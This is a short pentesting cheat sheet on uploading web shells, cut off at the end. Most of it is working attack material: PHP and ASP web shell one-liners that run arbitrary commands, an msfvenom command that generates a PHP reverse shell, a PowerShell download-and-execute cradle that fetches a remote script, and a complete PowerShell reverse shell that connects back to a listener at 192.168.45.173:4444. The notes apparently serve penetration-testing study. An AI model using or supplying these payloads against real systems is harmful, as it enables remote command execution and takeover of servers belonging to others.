Web Shell Upload Web Shell Check the programming language of the web app: enumerating common index page extensions, Wappalyzer Write a basic web shell payload in that programming language to check if there is any validation, for example: <?php file_get_contents('/etc/passwd'); ?> <?php system('hostname'); ?> <?php system($_REQUEST['cmd']); ?> <% eval request('cmd') %> Tools for opening a web shell: phpbash, SecLists (PHP), Antak Webshell (ASPX) Reverse Web Shell Main idea: use web shell to initiate a remote session from the target machine to the pentester's machine, thus enable interactive terminal to the target machine. Tools for opening a reverse web shell: php-reverse-shell Generate a reverse shell with msfvenom: msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Reverse shell for Windows: Powershell command to execute remote script: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173/ps.ps1')" Contents of backdoor.ps1: $client = New-Object System.Net.Sockets.TCPClient('192.168.45.173',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() Command…